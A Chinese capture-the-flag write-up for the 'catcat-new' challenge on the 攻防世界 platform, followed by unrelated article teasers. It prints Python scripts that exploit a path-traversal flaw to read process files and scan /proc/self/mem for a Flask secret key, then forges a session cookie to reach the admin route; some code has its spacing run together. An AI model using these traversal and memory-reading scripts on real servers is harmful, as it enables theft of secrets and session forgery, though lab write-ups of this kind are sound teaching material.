news 2026/4/18 9:35:50

攻防世界: catcat-new

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
攻防世界: catcat-new

攻防世界: catcat-new

本文知识点:

  1. 常用的系统文件的作用

    • /proc/self/cmdline: 程序启动的命令行参数
    • /proc/self/maps: 程序使用的内存地址(有点像页表,记录程序使用了那些地址,这些地址的读写权限等)
    • /proc/self/mem: 可以读取或则程序正在使用的内存,不能直接读取,需要配合/proc/self/maps来进行读取。(猜测虚拟地址的原因,导致很多内存实际是没有分配的,读取就会出错)
  2. flask伪造session的生成

    可以借助这个工具进行生成:https://github.com/noraj/flask-session-cookie-manager, 具体的使用见后文。

题目网页:

初步分析

经过一番点击后,发现可能有文件包含的漏洞,如下:

测试后确实存在文件包含相关的漏洞,如下:

proc/self/cmdline

查看当前程序启动时用的命令函参数:

格式化数据

前面得知存在文件包含的漏洞,因此可以考虑构造payload:../app.py, 得到app.py的源代码

可以使用下面的代码格式化数据

test=b'import os\nimport uuid\nfrom flask import Flask, request, session, render_template, Markup\nfrom cat import cat\n\nflag = ""\napp = Flask(\n __name__,\n static_url_path=\'/\', \n static_folder=\'static\' \n)\napp.config[\'SECRET_KEY\'] = str(uuid.uuid4()).replace("-", "") + "*abcdefgh"\nif os.path.isfile("/flag"):\n flag = cat("/flag")\n os.remove("/flag")\n\n@app.route(\'/\', methods=[\'GET\'])\ndef index():\n detailtxt = os.listdir(\'./details/\')\n cats_list = []\n for i in detailtxt:\n cats_list.append(i[:i.index(\'.\')])\n \n return render_template("index.html", cats_list=cats_list, cat=cat)\n\n\n\n@app.route(\'/info\', methods=["GET", \'POST\'])\ndef info():\n filename = "./details/" + request.args.get(\'file\', "")\n start = request.args.get(\'start\', "0")\n end = request.args.get(\'end\', "0")\n name = request.args.get(\'file\', "")[:request.args.get(\'file\', "").index(\'.\')]\n \n return render_template("detail.html", catname=name, info=cat(filename, start, end))\n \n\n\n@app.route(\'/admin\', methods=["GET"])\ndef admin_can_list_root():\n if session.get(\'admin\') == 1:\n return flag\n else:\n session[\'admin\'] = 0\n return "NoNoNo"\n\n\n\nif __name__ == \'__main__\':\n app.run(host=\'0.0.0.0\', debug=False, port=5637)'print(test.decode())

文件内容输出

importosimportuuidfromflaskimportFlask,request,session,render_template,Markupfromcatimportcat flag=""app=Flask(__name__,static_url_path='/',static_folder='static')app.config['SECRET_KEY']=str(uuid.uuid4()).replace("-","")+"*abcdefgh"ifos.path.isfile("/flag"):flag=cat("/flag")os.remove("/flag")@app.route('/',methods=['GET'])defindex():detailtxt=os.listdir('./details/')cats_list=[]foriindetailtxt:cats_list.append(i[:i.index('.')])returnrender_template("index.html",cats_list=cats_list,cat=cat)@app.route('/info',methods=["GET",'POST'])definfo():filename="./details/"+request.args.get('file',"")start=request.args.get('start',"0")end=request.args.get('end',"0")name=request.args.get('file',"")[:request.args.get('file',"").index('.')]returnrender_template("detail.html",catname=name,info=cat(filename,start,end))@app.route('/admin',methods=["GET"])defadmin_can_list_root():ifsession.get('admin')==1:returnflagelse:session['admin']=0return"NoNoNo"if__name__=='__main__':app.run(host='0.0.0.0',debug=False,port=5637)

代码解读:

下面部分代码生成SECRET_KEY, 这个**SECRET_KEY会被flask用来生成session**。后面我们伪造seesion的时候也需要用到。

app.config['SECRET_KEY']=str(uuid.uuid4()).replace("-","")+"*abcdefgh"

下面部分代码是读取flag这个文件,读取后进行删除,因此我们不能直接通过文件包含漏洞直接得到flag的内容

ifos.path.isfile("/flag"):flag=cat("/flag")os.remove("/flag")

下面这部分代码看到/admin这个路由下面有一个分支能够返回flag,但是需要session中的admin字段值为1,才会返回flag

@app.route('/admin',methods=["GET"])defadmin_can_list_root():ifsession.get('admin')==1:returnflagelse:session['admin']=0return"NoNoNo"

获得session的SECRET_KEY

前面得知我们需要访问/admin这个路由,并且session中admin字段的值必须为1,我们才能得到flag。因此我们考虑伪造session。

为了伪造session,我们需要先得到生成session的SECRET_KEY。由于这个key的特征比较明显,且以"*abcdefgh"结尾,因此我们直接通过读取程序的内存得到。

获取文件proc/self/maps的输出

为了读取/porc/self/mem,我们先读取proc/self/maps, 避免访问到未分配的内存,导致程序崩溃。可以使用下面的代码获得文件的输出,并保存到maps.txt

importrequests url='http://61.147.171.103:56444/info'# 这个函数的功能是穷举../的个数,实际上../后面发现都是两个def get_file(file,n=10): by_pass="../"foriinrange(n): params={'file':by_pass * i + file}res=requests.get(url,params=params)ifres.status_code==200and"not exist or can not be read"notinres.text: by_pass=by_pass * ireturnresreturnNone res=get_file("proc/self/maps")print(res.url)tmp=re.search("<p>(.*?)</p>", res.text)b=eval(html.unescape(tmp.group(1)))# 将得到的数据解析,然后转换为字节数组with open("maps.txt","w")as f: f.write(html.unescape(b.decode()))

读取proc/self/mem中的内容

读取maps.txt文件中的内容,并根据此来读取服务器中文件proc/self/mem中的内容

importrequests url='http://61.147.171.103:56444/info'addr=[]withopen("./maps.txt","r")asf:forlineinf.readlines():if"rw"inline:res=re.search("([0-9a-f]+)-([0-9a-f]+)",line)start_addr=res.group(1)end_addr=res.group(2)addr.append((int(start_addr,16),int(end_addr,16)))param={"file":"../../proc/self/mem","start":addr[0][0],"end":addr[0][1]}res=requests.get(url,params=param)print(res.url)print(len(addr))fors,einaddr:param={"file":"../../proc/self/mem","start":s,"end":e}try:res=requests.get(url,params=param,timeout=10)ifres.status_code==200:# breakprint(res.url)secret_key=re.findall(r"[a-z0-9]{32}\*abcdefgh",res.text)ifsecret_key:print(secret_key)# 输出 ['35283a686d334d68a247b335e39149e4*abcdefgh']breakexceptrequests.exceptions.Timeout:print("超时")

输出结果:['35283a686d334d68a247b335e39149e4*abcdefgh']

也就是SECRET_KEY的值为35283a686d334d68a247b335e39149e4*abcdefgh

通过SECRET_KEY伪造session

访问/admin路径

当我们访问/admin这个路由的时候,我们会收到服务端返回的session数据。我们需要保留session中的其他字段,只修改admin字段(虽然这个seesion中只有admin字段,但是实际场景中可能含有多个)。

然后使用flask_session_cookie_manager3.py进行解密,其中文件可以从https://github.com/noraj/flask-session-cookie-manager得到。

如上图, 将服务器传送的session解码,然后修改内容,加密得到的session为eyJhZG1pbiI6MX0.aW4zWw.rP0KTjXqUOOC3oG2srnVC75RIYg

将session设置到请求头中,然后发送请求,得到flag!!!

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/4/18 8:36:04

PinWin:简单实用的Windows窗口置顶工具完整指南

PinWin&#xff1a;简单实用的Windows窗口置顶工具完整指南 【免费下载链接】PinWin Pin any window to be always on top of the screen 项目地址: https://gitcode.com/gh_mirrors/pin/PinWin PinWin是一款专门为Windows用户设计的免费开源窗口管理工具&#xff0c;能…

作者头像 李华
网站建设 2026/4/18 8:06:52

实时流式识别体验:Fun-ASR模拟流式效果实测

实时流式识别体验&#xff1a;Fun-ASR模拟流式效果实测 你有没有这样的需求&#xff1a;在开会时&#xff0c;希望语音能一边说、文字一边出&#xff1f;或者做直播访谈&#xff0c;想实时生成字幕&#xff1f;传统语音识别往往是“录完再转”&#xff0c;等全部音频上传完才开…

作者头像 李华
网站建设 2026/4/18 10:05:58

MGeo模型部署卡顿?3步搞定GPU算力适配问题实战案例

MGeo模型部署卡顿&#xff1f;3步搞定GPU算力适配问题实战案例 你是不是也遇到过这种情况&#xff1a;兴冲冲地部署了阿里开源的MGeo地址相似度识别模型&#xff0c;准备在项目中大展身手&#xff0c;结果一运行就卡得不行&#xff0c;推理速度慢得像蜗牛爬&#xff1f;别急&a…

作者头像 李华
网站建设 2026/4/18 8:16:38

超实用Chrome扩展:右键一键保存图片为PNG/JPG/WebP格式

超实用Chrome扩展&#xff1a;右键一键保存图片为PNG/JPG/WebP格式 【免费下载链接】Save-Image-as-Type Save Image as Type is an chrome extension which add Save as PNG / JPG / WebP to the context menu of image. 项目地址: https://gitcode.com/gh_mirrors/sa/Save-…

作者头像 李华
网站建设 2026/4/18 8:09:34

qmc-decoder:解锁QQ音乐加密文件的终极解决方案

qmc-decoder&#xff1a;解锁QQ音乐加密文件的终极解决方案 【免费下载链接】qmc-decoder Fastest & best convert qmc 2 mp3 | flac tools 项目地址: https://gitcode.com/gh_mirrors/qm/qmc-decoder 还在为QQ音乐下载的歌曲只能在特定播放器里播放而烦恼吗&#x…

作者头像 李华
网站建设 2026/4/18 8:00:06

通达信数据接口实战指南:mootdx框架深度解析与量化应用

通达信数据接口实战指南&#xff1a;mootdx框架深度解析与量化应用 【免费下载链接】mootdx 通达信数据读取的一个简便使用封装 项目地址: https://gitcode.com/GitHub_Trending/mo/mootdx 在金融数据获取领域&#xff0c;传统方案往往面临协议复杂、数据格式不统一、网…

作者头像 李华